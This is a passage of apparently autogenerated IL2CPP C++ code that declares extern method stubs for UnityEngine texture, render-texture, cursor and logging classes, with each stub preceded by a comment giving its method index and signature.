// 0x00000312 System.Boolean UnityEngine.Texture3D::get_isReadable()
extern void Texture3D_get_isReadable_mC8D0F22C0C3C9524FE31A0E3A70A27233AAF1031 (void);
// 0x00000313 System.Boolean UnityEngine.Texture3D::Internal_CreateImpl(UnityEngine.Texture3D,System.Int32,System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags,System.IntPtr)
extern void Texture3D_Internal_CreateImpl_mD29CBC93948BE3645FC65183337D852A25B90DDC (void);
// 0x00000314 System.Void UnityEngine.Texture3D::Internal_Create(UnityEngine.Texture3D,System.Int32,System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags,System.IntPtr)
extern void Texture3D_Internal_Create_m5A9B7F106F9F2D3693DD060EEEE45C8C528C0F2F (void);
// 0x00000315 System.Void UnityEngine.Texture3D::UpdateExternalTexture(System.IntPtr)
extern void Texture3D_UpdateExternalTexture_mDF4E8A634EC749B99E5AC5616F776BF42188A607 (void);
// 0x00000316 System.Void UnityEngine.Texture3D::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.DefaultFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void Texture3D__ctor_mBF5766666A0CAAE44719627620B2BA7F99A14054 (void);
// 0x00000317 System.Void UnityEngine.Texture3D::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void Texture3D__ctor_mA853CA41A85C285281FB928BC926B0798987B17F (void);
// 0x00000318 System.Void UnityEngine.Texture3D::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags,System.Int32)
extern void Texture3D__ctor_m2814019477DFC8BAD31E7C3CEEEBB693DC26A67E (void);
// 0x00000319 System.Void UnityEngine.Texture3D::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.TextureFormat,System.Int32)
extern void Texture3D__ctor_mFAEE4FD4E1E5A8093603E8C08F3909DDEDD41EFB (void);
// 0x0000031A System.Void UnityEngine.Texture3D::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.TextureFormat,System.Int32,System.IntPtr)
extern void Texture3D__ctor_mD7476DE7FCF3F8811FD94C81CD51AD5A8AF2CD34 (void);
// 0x0000031B System.Void UnityEngine.Texture3D::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.TextureFormat,System.Boolean)
extern void Texture3D__ctor_m0026373ADF87B100336F82579802E7819A5DB0F2 (void);
// 0x0000031C System.Void UnityEngine.Texture3D::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.TextureFormat,System.Boolean,System.IntPtr)
extern void Texture3D__ctor_mD27F46A8B13B79866370D54112CB569B104886A2 (void);
// 0x0000031D UnityEngine.Texture3D UnityEngine.Texture3D::CreateExternalTexture(System.Int32,System.Int32,System.Int32,UnityEngine.TextureFormat,System.Boolean,System.IntPtr)
extern void Texture3D_CreateExternalTexture_mBF7F63C80D482DF8102B40015579D457FEC8817B (void);
// 0x0000031E System.Void UnityEngine.Texture3D::ValidateIsNotCrunched(UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void Texture3D_ValidateIsNotCrunched_m82F76B28D3BCD7A6E43D1E15D31FF3C23C8AD3B2 (void);
// 0x0000031F System.Int32 UnityEngine.Texture2DArray::get_allSlices()
extern void Texture2DArray_get_allSlices_m1F5B5A3B87999EF6512EA976A810E777D042860E (void);
// 0x00000320 System.Boolean UnityEngine.Texture2DArray::get_isReadable()
extern void Texture2DArray_get_isReadable_m1C8E2BAFBA65C894DAC0F30C9FC685173B879C32 (void);
// 0x00000321 System.Boolean UnityEngine.Texture2DArray::Internal_CreateImpl(UnityEngine.Texture2DArray,System.Int32,System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void Texture2DArray_Internal_CreateImpl_m00EA6E728CE6ECCEBEC2F29132CF5B059E1F9E7D (void);
// 0x00000322 System.Void UnityEngine.Texture2DArray::Internal_Create(UnityEngine.Texture2DArray,System.Int32,System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void Texture2DArray_Internal_Create_m2AE47A76D61B8F73E40AFAE98DCC119E03683A29 (void);
// 0x00000323 System.Boolean UnityEngine.Texture2DArray::ValidateFormat(UnityEngine.TextureFormat,System.Int32,System.Int32)
extern void Texture2DArray_ValidateFormat_mBE783ADB196C4C046E69C370387E0CAFB5B26A25 (void);
// 0x00000324 System.Boolean UnityEngine.Texture2DArray::ValidateFormat(UnityEngine.Experimental.Rendering.GraphicsFormat,System.Int32,System.Int32)
extern void Texture2DArray_ValidateFormat_m2155230AF829C3BD0B76D886B9D83A74F9994921 (void);
// 0x00000325 System.Void UnityEngine.Texture2DArray::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.DefaultFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void Texture2DArray__ctor_mE60F3475E1987C78E2055BFDB60394D9CBDEA395 (void);
// 0x00000326 System.Void UnityEngine.Texture2DArray::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void Texture2DArray__ctor_m465591352202E3D5CAF529F8CB094FB2E52C6EA0 (void);
// 0x00000327 System.Void UnityEngine.Texture2DArray::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags,System.Int32)
extern void Texture2DArray__ctor_m6EA4D33D0E4804BD374D86BDE37A5F7F860200C4 (void);
// 0x00000328 System.Void UnityEngine.Texture2DArray::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.TextureFormat,System.Int32,System.Boolean)
extern void Texture2DArray__ctor_m7C3429ECA397399F19C750F842573B920C6CAF78 (void);
// 0x00000329 System.Void UnityEngine.Texture2DArray::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.TextureFormat,System.Boolean,System.Boolean)
extern void Texture2DArray__ctor_m815CEB6ACC6C586A3D696AFA09D78C5B1957F9C0 (void);
// 0x0000032A System.Void UnityEngine.Texture2DArray::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.TextureFormat,System.Boolean)
extern void Texture2DArray__ctor_m02B575835C1D88384829865AAC5A30228AB9C12C (void);
// 0x0000032B System.Void UnityEngine.Texture2DArray::ValidateIsNotCrunched(UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void Texture2DArray_ValidateIsNotCrunched_m4F9EADC3BD464AFC7F8B823A4105D5FB3C5BB2D3 (void);
// 0x0000032C System.Boolean UnityEngine.CubemapArray::get_isReadable()
extern void CubemapArray_get_isReadable_m316414972F31FD8FA45F78EB2A41585E886CA868 (void);
// 0x0000032D System.Boolean UnityEngine.CubemapArray::Internal_CreateImpl(UnityEngine.CubemapArray,System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void CubemapArray_Internal_CreateImpl_mCEBD03EDBA0965992C656BFB39E033EC0FA82361 (void);
// 0x0000032E System.Void UnityEngine.CubemapArray::Internal_Create(UnityEngine.CubemapArray,System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void CubemapArray_Internal_Create_m5F3576FC64B64242CE813C9345C3AD7E9AFF83CD (void);
// 0x0000032F System.Void UnityEngine.CubemapArray::.ctor(System.Int32,System.Int32,UnityEngine.Experimental.Rendering.DefaultFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void CubemapArray__ctor_m540A30E402A99397CC4A65A38954283C69FB9B75 (void);
// 0x00000330 System.Void UnityEngine.CubemapArray::.ctor(System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void CubemapArray__ctor_mD255863D4BD2CC18AF0065CAB121609A82019676 (void);
// 0x00000331 System.Void UnityEngine.CubemapArray::.ctor(System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.TextureCreationFlags,System.Int32)
extern void CubemapArray__ctor_m0C70134AD214861C2B196A31E5F5156B56CEBF7D (void);
// 0x00000332 System.Void UnityEngine.CubemapArray::.ctor(System.Int32,System.Int32,UnityEngine.TextureFormat,System.Int32,System.Boolean)
extern void CubemapArray__ctor_m1DB13F0A5997B95E8E30369997CEF9268496881F (void);
// 0x00000333 System.Void UnityEngine.CubemapArray::.ctor(System.Int32,System.Int32,UnityEngine.TextureFormat,System.Boolean,System.Boolean)
extern void CubemapArray__ctor_m8F5B690A043EB48E7996148A50F243BF5FE3D65E (void);
// 0x00000334 System.Void UnityEngine.CubemapArray::.ctor(System.Int32,System.Int32,UnityEngine.TextureFormat,System.Boolean)
extern void CubemapArray__ctor_mF817A910C4140CA704BEA27D6111D1BAFD07E7F1 (void);
// 0x00000335 System.Void UnityEngine.CubemapArray::ValidateIsNotCrunched(UnityEngine.Experimental.Rendering.TextureCreationFlags)
extern void CubemapArray_ValidateIsNotCrunched_m394935252E32993B8E273689FAC21234257A2F73 (void);
// 0x00000336 System.Int32 UnityEngine.RenderTexture::get_width()
extern void RenderTexture_get_width_m1B8A7D17591897EFAA8C841795A9BD15EA5C7B31 (void);
// 0x00000337 System.Void UnityEngine.RenderTexture::set_width(System.Int32)
extern void RenderTexture_set_width_mDCDF28DB4E7CC398E5EA31B7A8B39B0D34D7FAB1 (void);
// 0x00000338 System.Int32 UnityEngine.RenderTexture::get_height()
extern void RenderTexture_get_height_m9695AE75401A1D89227C6827843F4ADF4A3EAD74 (void);
// 0x00000339 System.Void UnityEngine.RenderTexture::set_height(System.Int32)
extern void RenderTexture_set_height_m04F8A4678F13855D357AA3458097DF1FD6D5BDEE (void);
// 0x0000033A System.Void UnityEngine.RenderTexture::set_graphicsFormat(UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void RenderTexture_set_graphicsFormat_m4CFDFF4CEC81B5350AE94D466585C8186E06B733 (void);
// 0x0000033B System.Void UnityEngine.RenderTexture::set_depthStencilFormat(UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void RenderTexture_set_depthStencilFormat_mCEED5DA45F9F19CD67D960D896400E85B1211855 (void);
// 0x0000033C UnityEngine.RenderTexture UnityEngine.RenderTexture::GetActive()
extern void RenderTexture_GetActive_m6F725FD195023A77D29B948FC3B7D813F5DF06C1 (void);
// 0x0000033D System.Void UnityEngine.RenderTexture::SetActive(UnityEngine.RenderTexture)
extern void RenderTexture_SetActive_mED4F14FE8DA350D742C47254DA9A93BEA35533D6 (void);
// 0x0000033E UnityEngine.RenderTexture UnityEngine.RenderTexture::get_active()
extern void RenderTexture_get_active_m2204DF860773F9A8CDFF92BDB35CEB72A0643345 (void);
// 0x0000033F System.Void UnityEngine.RenderTexture::set_active(UnityEngine.RenderTexture)
extern void RenderTexture_set_active_m045EA53D62FBF79693265E33D14D8E0E8151A37E (void);
// 0x00000340 UnityEngine.RenderBuffer UnityEngine.RenderTexture::GetColorBuffer()
extern void RenderTexture_GetColorBuffer_mDCF981FDA18342C7D239932B7105CA0DB1798E4A (void);
// 0x00000341 UnityEngine.RenderBuffer UnityEngine.RenderTexture::GetDepthBuffer()
extern void RenderTexture_GetDepthBuffer_mA3CA39776C8174D199AD26E868B3EB720C6B801B (void);
// 0x00000342 System.Void UnityEngine.RenderTexture::SetMipMapCount(System.Int32)
extern void RenderTexture_SetMipMapCount_m037EE54855938389E781C6CFA5A398641BC7CB83 (void);
// 0x00000343 UnityEngine.RenderBuffer UnityEngine.RenderTexture::get_colorBuffer()
extern void RenderTexture_get_colorBuffer_mE043AF01C1B2FB73BDC9C82D78528A367089CDE0 (void);
// 0x00000344 UnityEngine.RenderBuffer UnityEngine.RenderTexture::get_depthBuffer()
extern void RenderTexture_get_depthBuffer_mBBDFA14B3AC2AE4796795E89A0BCA59D54B859D5 (void);
// 0x00000345 System.Void UnityEngine.RenderTexture::SetSRGBReadWrite(System.Boolean)
extern void RenderTexture_SetSRGBReadWrite_mBE116D34F4B919AC7E48814ABC9D623A9FE518C0 (void);
// 0x00000346 System.Void UnityEngine.RenderTexture::Internal_Create(UnityEngine.RenderTexture)
extern void RenderTexture_Internal_Create_m9AEDC02BF516D449A0F35D379D3E8E220A7FEE51 (void);
// 0x00000347 System.Void UnityEngine.RenderTexture::SetRenderTextureDescriptor(UnityEngine.RenderTextureDescriptor)
extern void RenderTexture_SetRenderTextureDescriptor_m498C0757E95407077AF11B034319DF7AC904BA18 (void);
// 0x00000348 UnityEngine.RenderTextureDescriptor UnityEngine.RenderTexture::GetDescriptor()
extern void RenderTexture_GetDescriptor_mB180407D5E1215BF1651A913AC146D25EAE9C6BC (void);
// 0x00000349 UnityEngine.RenderTexture UnityEngine.RenderTexture::GetTemporary_Internal(UnityEngine.RenderTextureDescriptor)
extern void RenderTexture_GetTemporary_Internal_m693D7407D1D928E322B0BA5FF82B8D73785F3667 (void);
// 0x0000034A System.Void UnityEngine.RenderTexture::ReleaseTemporary(UnityEngine.RenderTexture)
extern void RenderTexture_ReleaseTemporary_m7D9B385460ED0D0CF7BCC033605CEBD60A1A232F (void);
// 0x0000034B System.Void UnityEngine.RenderTexture::.ctor()
extern void RenderTexture__ctor_m731283139A246174F3F33B37991F9BFFBD29293D (void);
// 0x0000034C System.Void UnityEngine.RenderTexture::.ctor(UnityEngine.RenderTextureDescriptor)
extern void RenderTexture__ctor_m1CBDB7F13C2CE49A31EE654081F01C4F874EA5E3 (void);
// 0x0000034D System.Void UnityEngine.RenderTexture::.ctor(UnityEngine.RenderTexture)
extern void RenderTexture__ctor_mF6FCD7FA9976CC646BDF8715157EA198A992E75B (void);
// 0x0000034E System.Void UnityEngine.RenderTexture::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.DefaultFormat)
extern void RenderTexture__ctor_m69A0AF5C6CCFFFB58D9F5A0C975D0272CA66684B (void);
// 0x0000034F System.Void UnityEngine.RenderTexture::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void RenderTexture__ctor_m0C81127DE754F64FDD3E80E94BE11054B2791F98 (void);
// 0x00000350 System.Void UnityEngine.RenderTexture::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,System.Int32)
extern void RenderTexture__ctor_m583FCACDD5FCA4102329911331B6DC51660795F0 (void);
// 0x00000351 System.Void UnityEngine.RenderTexture::.ctor(System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.GraphicsFormat,System.Int32)
extern void RenderTexture__ctor_m0F1316F315E35B4E305FE929604E8F489189C39D (void);
// 0x00000352 System.Void UnityEngine.RenderTexture::.ctor(System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void RenderTexture__ctor_mD60FB2D8D9560774F2E21BAC0A0061CB17904EA3 (void);
// 0x00000353 System.Void UnityEngine.RenderTexture::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.RenderTextureFormat,UnityEngine.RenderTextureReadWrite)
extern void RenderTexture__ctor_m68A1B9CAA1BE0B597C5F4895C296E21502D0C962 (void);
// 0x00000354 System.Void UnityEngine.RenderTexture::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.RenderTextureFormat)
extern void RenderTexture__ctor_m53215A8EDDE262932758186108347685F6A512C4 (void);
// 0x00000355 System.Void UnityEngine.RenderTexture::.ctor(System.Int32,System.Int32,System.Int32)
extern void RenderTexture__ctor_m45EACC89DDF408948889586516B3CA7AA8B73BFA (void);
// 0x00000356 System.Void UnityEngine.RenderTexture::.ctor(System.Int32,System.Int32,System.Int32,UnityEngine.RenderTextureFormat,System.Int32)
extern void RenderTexture__ctor_m7E177DB2DEF7CD2EEB812EEB262081E923BEF2AC (void);
// 0x00000357 System.Void UnityEngine.RenderTexture::Initialize(System.Int32,System.Int32,System.Int32,UnityEngine.RenderTextureFormat,UnityEngine.RenderTextureReadWrite,System.Int32)
extern void RenderTexture_Initialize_m924B8245CB23DF4FECCF5A68B158A393DC0401D0 (void);
// 0x00000358 UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.RenderTexture::GetDepthStencilFormatLegacy(System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void RenderTexture_GetDepthStencilFormatLegacy_mAD2A6254B0A8970AF22A5306A35CE6993E0C597B (void);
// 0x00000359 UnityEngine.RenderTextureDescriptor UnityEngine.RenderTexture::get_descriptor()
extern void RenderTexture_get_descriptor_m2FABD5CF6CCF410D1311FCBC7C9D9ECDEE9C7CC2 (void);
// 0x0000035A System.Void UnityEngine.RenderTexture::ValidateRenderTextureDesc(UnityEngine.RenderTextureDescriptor)
extern void RenderTexture_ValidateRenderTextureDesc_m8D6636ECF3C97BC7C5E2504C1E355C4696A92B3C (void);
// 0x0000035B UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.RenderTexture::GetCompatibleFormat(UnityEngine.RenderTextureFormat,UnityEngine.RenderTextureReadWrite)
extern void RenderTexture_GetCompatibleFormat_m09EDE465FBF7B691B3BC8510C16461738E4EE8C1 (void);
// 0x0000035C UnityEngine.RenderTexture UnityEngine.RenderTexture::GetTemporary(UnityEngine.RenderTextureDescriptor)
extern void RenderTexture_GetTemporary_m67446280ADE53A43FC26C671AFE7FE6912888CB5 (void);
// 0x0000035D UnityEngine.RenderTexture UnityEngine.RenderTexture::GetTemporaryImpl(System.Int32,System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,System.Int32,UnityEngine.RenderTextureMemoryless,UnityEngine.VRTextureUsage,System.Boolean)
extern void RenderTexture_GetTemporaryImpl_m8CB5433ECBBA6C7FB7BBAC13CAA26EDE67242C66 (void);
// 0x0000035E UnityEngine.RenderTexture UnityEngine.RenderTexture::GetTemporary(System.Int32,System.Int32,System.Int32,UnityEngine.RenderTextureFormat)
extern void RenderTexture_GetTemporary_mEB21705B78CAF6B8F1F6617453A8EE8A94498DE2 (void);
// 0x0000035F System.Void UnityEngine.RenderTexture::GetColorBuffer_Injected(UnityEngine.RenderBuffer&)
extern void RenderTexture_GetColorBuffer_Injected_m1AC1564038AB3F39ECFDB8C98AC573F4803BEE68 (void);
// 0x00000360 System.Void UnityEngine.RenderTexture::GetDepthBuffer_Injected(UnityEngine.RenderBuffer&)
extern void RenderTexture_GetDepthBuffer_Injected_m5EA9252E3F0DFAEDE76303614E7683CC549B05F4 (void);
// 0x00000361 System.Void UnityEngine.RenderTexture::SetRenderTextureDescriptor_Injected(UnityEngine.RenderTextureDescriptor&)
extern void RenderTexture_SetRenderTextureDescriptor_Injected_m92390C2D26840E69E7B8F3DF5DA44FCB078F363F (void);
// 0x00000362 System.Void UnityEngine.RenderTexture::GetDescriptor_Injected(UnityEngine.RenderTextureDescriptor&)
extern void RenderTexture_GetDescriptor_Injected_m37E30C68CAB7F283BDD1FA2F580066C4BA80A085 (void);
// 0x00000363 UnityEngine.RenderTexture UnityEngine.RenderTexture::GetTemporary_Internal_Injected(UnityEngine.RenderTextureDescriptor&)
extern void RenderTexture_GetTemporary_Internal_Injected_mD45A6A56D7280A557FF7199CD66CDEDFD3FC3D2A (void);
// 0x00000364 System.Int32 UnityEngine.RenderTextureDescriptor::get_width()
extern void RenderTextureDescriptor_get_width_mB159E4EB08B23B19CCCFADB465864361FB840BFF (void);
// 0x00000365 System.Void UnityEngine.RenderTextureDescriptor::set_width(System.Int32)
extern void RenderTextureDescriptor_set_width_m3B2494007BFE3AD4D14403407C9B24F5045E7E10 (void);
// 0x00000366 System.Int32 UnityEngine.RenderTextureDescriptor::get_height()
extern void RenderTextureDescriptor_get_height_m1006F9AA45029715C552C8A8C2F102F63D3A91EC (void);
// 0x00000367 System.Void UnityEngine.RenderTextureDescriptor::set_height(System.Int32)
extern void RenderTextureDescriptor_set_height_m1FE41111472DAA9B5E80FFAF3445004D72A3CFA5 (void);
// 0x00000368 System.Int32 UnityEngine.RenderTextureDescriptor::get_msaaSamples()
extern void RenderTextureDescriptor_get_msaaSamples_mFCC33643AFF2265C8305DCFD79ED8774A1A8FA22 (void);
// 0x00000369 System.Void UnityEngine.RenderTextureDescriptor::set_msaaSamples(System.Int32)
extern void RenderTextureDescriptor_set_msaaSamples_m6910E09489372746391B14FBAF59A7237539D6C4 (void);
// 0x0000036A System.Int32 UnityEngine.RenderTextureDescriptor::get_volumeDepth()
extern void RenderTextureDescriptor_get_volumeDepth_m528818299E101F1B285B08BE12FAC2F9A871BA36 (void);
// 0x0000036B System.Void UnityEngine.RenderTextureDescriptor::set_volumeDepth(System.Int32)
extern void RenderTextureDescriptor_set_volumeDepth_mEF9610D1C14182417A01B7243DEE6B559A13B34D (void);
// 0x0000036C System.Void UnityEngine.RenderTextureDescriptor::set_mipCount(System.Int32)
extern void RenderTextureDescriptor_set_mipCount_mDCC85ED7D97BD64A290A21DB91BC5CB1C4BA95EF (void);
// 0x0000036D UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.RenderTextureDescriptor::get_graphicsFormat()
extern void RenderTextureDescriptor_get_graphicsFormat_m50F25A4F179EA318C8D3B0D8685F9C5F59F7DEC0 (void);
// 0x0000036E System.Void UnityEngine.RenderTextureDescriptor::set_graphicsFormat(UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void RenderTextureDescriptor_set_graphicsFormat_m037DA25F9A8B956D830C7B7E5C6E258DC1133A13 (void);
// 0x0000036F UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.RenderTextureDescriptor::get_depthStencilFormat()
extern void RenderTextureDescriptor_get_depthStencilFormat_m360929BE5BD10E9C3D8C936AA6B44B1D11C119CB (void);
// 0x00000370 System.Void UnityEngine.RenderTextureDescriptor::set_depthStencilFormat(UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void RenderTextureDescriptor_set_depthStencilFormat_m7EC335006743B59AAD1895AD06B2DD74333F9A03 (void);
// 0x00000371 System.Int32 UnityEngine.RenderTextureDescriptor::get_depthBufferBits()
extern void RenderTextureDescriptor_get_depthBufferBits_mC095E36F9803B2E68E258C03E48ACD0B0E678953 (void);
// 0x00000372 System.Void UnityEngine.RenderTextureDescriptor::set_depthBufferBits(System.Int32)
extern void RenderTextureDescriptor_set_depthBufferBits_mA3710C0D6E485BA6465B328CD8B1954F0E4C5819 (void);
// 0x00000373 System.Void UnityEngine.RenderTextureDescriptor::set_dimension(UnityEngine.Rendering.TextureDimension)
extern void RenderTextureDescriptor_set_dimension_mCE9A4A08454BB2D9DFE3E505EC336FD480078F39 (void);
// 0x00000374 System.Void UnityEngine.RenderTextureDescriptor::set_shadowSamplingMode(UnityEngine.Rendering.ShadowSamplingMode)
extern void RenderTextureDescriptor_set_shadowSamplingMode_m4B4CE918DFFF1CC5E3AF981456E186F15FC5DB93 (void);
// 0x00000375 System.Void UnityEngine.RenderTextureDescriptor::set_vrUsage(UnityEngine.VRTextureUsage)
extern void RenderTextureDescriptor_set_vrUsage_m994CB3D4B250A70BE005D9FDFD24D868E07A52F0 (void);
// 0x00000376 System.Void UnityEngine.RenderTextureDescriptor::set_memoryless(UnityEngine.RenderTextureMemoryless)
extern void RenderTextureDescriptor_set_memoryless_m9ECE149930C0E2629A5CD9DA1CD0EA2A01FFE1B2 (void);
// 0x00000377 System.Void UnityEngine.RenderTextureDescriptor::.ctor(System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void RenderTextureDescriptor__ctor_m8B0D32DC550540B5546891C2F6300F384D6FE692 (void);
// 0x00000378 System.Void UnityEngine.RenderTextureDescriptor::.ctor(System.Int32,System.Int32,UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.GraphicsFormat,System.Int32)
extern void RenderTextureDescriptor__ctor_m8F8897C63F614AEA4348A95293C911C1293DA3A4 (void);
// 0x00000379 System.Void UnityEngine.RenderTextureDescriptor::SetOrClearRenderTextureCreationFlag(System.Boolean,UnityEngine.RenderTextureCreationFlags)
extern void RenderTextureDescriptor_SetOrClearRenderTextureCreationFlag_m4C08C7A3F715426EBECA2B983361908D097C6424 (void);
// 0x0000037A System.Void UnityEngine.RenderTextureDescriptor::set_createdFromScript(System.Boolean)
extern void RenderTextureDescriptor_set_createdFromScript_mEE28DED1D3C20DA025A0C44E1C2A531685194F23 (void);
// 0x0000037B System.Void UnityEngine.RenderTextureDescriptor::set_useDynamicScale(System.Boolean)
extern void RenderTextureDescriptor_set_useDynamicScale_m9335866C8754D51235D391E84F8972C4C518844A (void);
// 0x0000037C System.Void UnityEngine.Cursor::SetCursor(UnityEngine.Texture2D,UnityEngine.Vector2,UnityEngine.CursorMode)
extern void Cursor_SetCursor_m04453993587B6E24034859C1B4FF36423BC493EE (void);
// 0x0000037D UnityEngine.CursorLockMode UnityEngine.Cursor::get_lockState()
extern void Cursor_get_lockState_m99E97A23A051AA1167B9C49C3F6E8244E74531AE (void);
// 0x0000037E System.Void UnityEngine.Cursor::SetCursor_Injected(UnityEngine.Texture2D,UnityEngine.Vector2&,UnityEngine.CursorMode)
extern void Cursor_SetCursor_Injected_m8125D93C00203B82AB835E843DF4CCFE3D1B35DD (void);
// 0x0000037F UnityEngine.ILogHandler UnityEngine.ILogger::get_logHandler()
// 0x00000380 System.Boolean UnityEngine.ILogger::get_logEnabled()
// 0x00000381 System.Void UnityEngine.ILogger::Log(UnityEngine.LogType,System.Object)
// 0x00000382 System.Void UnityEngine.ILogger::Log(UnityEngine.LogType,System.Object,UnityEngine.Object)
// 0x00000383 System.Void UnityEngine.ILogger::LogError(System.String,System.Object)
// 0x00000384 System.Void UnityEngine.ILogger::LogFormat(UnityEngine.LogType,System.String,System.Object[])
// 0x00000385 System.Void UnityEngine.ILogHandler::LogFormat(UnityEngine.LogType,UnityEngine.Object,System.String,System.Object[])
// 0x00000386 System.Void UnityEngine.ILogHandler::LogException(System.Exception,UnityEngine.Object)
// 0x00000387 System.Void UnityEngine.Logger::.ctor(UnityEngine.ILogHandler)
extern void Logger__ctor_m3155E21A68AA616431A260A3FCBB4B074DF6FAA2 (void);
// 0x00000388 UnityEngine.ILogHandler UnityEngine.Logger::get_logHandler()
extern void Logger_get_logHandler_m4FAA2028695BD9FBA134E836AD52480984E82215 (void);
// 0x00000389 System.Void UnityEngine.Logger::set_logHandler(UnityEngine.ILogHandler)
extern void Logger_set_logHandler_mD2A80ADC7D4155C91B68EAE1FDBD7ECBF6DB49D3 (void);
// 0x0000038A System.Boolean UnityEngine.Logger::get_logEnabled()
extern void Logger_get_logEnabled_m0A868820FAADBF477B46963F5050AFCBBC46AF0B (void);
// 0x0000038B System.Void UnityEngine.Logger::set_logEnabled(System.Boolean)
extern void Logger_set_logEnabled_m3FBDDB7D1C5D9854C0F32ED6F7AB0348F286F52E (void);
// 0x0000038C UnityEngine.LogType UnityEngine.Logger::get_filterLogType()
extern void Logger_get_filterLogType_mCE9711AF596B77EAD158590247FA5FC855F54A54 (void);
// 0x0000038D System.Void UnityEngine.Logger::set_filterLogType(UnityEngine.LogType)
extern void Logger_set_filterLogType_m8EF119582F4975FE3D297EE71F9D3E1CFEA7AB74 (void);
// 0x0000038E System.Boolean UnityEngine.Logger::IsLogTypeAllowed(UnityEngine.LogType)
extern void Logger_IsLogTypeAllowed_mFE76B00210BF4431747A69A28A15EE2BF1A0D586 (void);
// 0x0000038F System.String UnityEngine.Logger::GetString(System.Object)
extern void Logger_GetString_mA45CFEFEB29D9F804C091BAC5F098CB7B3B6ADD7 (void);
// 0x00000390 System.Void UnityEngine.Logger::Log(UnityEngine.LogType,System.Object)
extern void Logger_Log_mEA3D39763D610E92491AA479BA653ECFEE3E9E5C (void);
// 0x00000391 System.Void UnityEngine.Logger::Log(UnityEngine.LogType,System.Object,UnityEngine.Object)
extern void Logger_Log_mF8C7E8A8CC31E04732044D73D2CB551D7CCB8995 (void);
// 0x00000392 System.Void UnityEngine.Logger::LogError(System.String,System.Object)
extern void Logger_LogError_m4612980842D15256036F4EB16BADF13FD49F38F5 (void);
// 0x00000393 System.Void UnityEngine.Logger::LogException(System.Exception,UnityEngine.Object)
extern void Logger_LogException_m591AF39F0886DA44666068EDBBD3CCF07623CFBB (void);
// 0x00000394 System.Void UnityEngine.Logger::LogFormat(UnityEngine.LogType,System.String,System.Object[])
extern void Logger_LogFormat_m5A31966B8AA13AC1FFEC1DED42F56FA966459093 (void);
// 0x00000395 System.Void UnityEngine.Logger::LogFormat(UnityEngine.LogType,UnityEngine.Object,System.String,System.Object[])
extern void Logger_LogFormat_m776A546E755F914039AB8591E23D08510308DB4C (void);
// 0x00000396 System.Void UnityEngine.UnityLogWriter::WriteStringToUnityLog(System.String)
extern void UnityLogWriter_WriteStringToUnityLog_m03DF7718BD577F83C1990431ACEF20AA204A9BAA (void);
// 0x00000397 System.Void UnityEngine.UnityLogWriter::WriteStringToUnityLogImpl(System.String)
extern void UnityLogWriter_WriteStringToUnityLogImpl_m3C3AF5334546A58772F28CB81059D26BFC50DC26 (void);
// 0x00000398 System.Void UnityEngine.UnityLogWriter::Init()
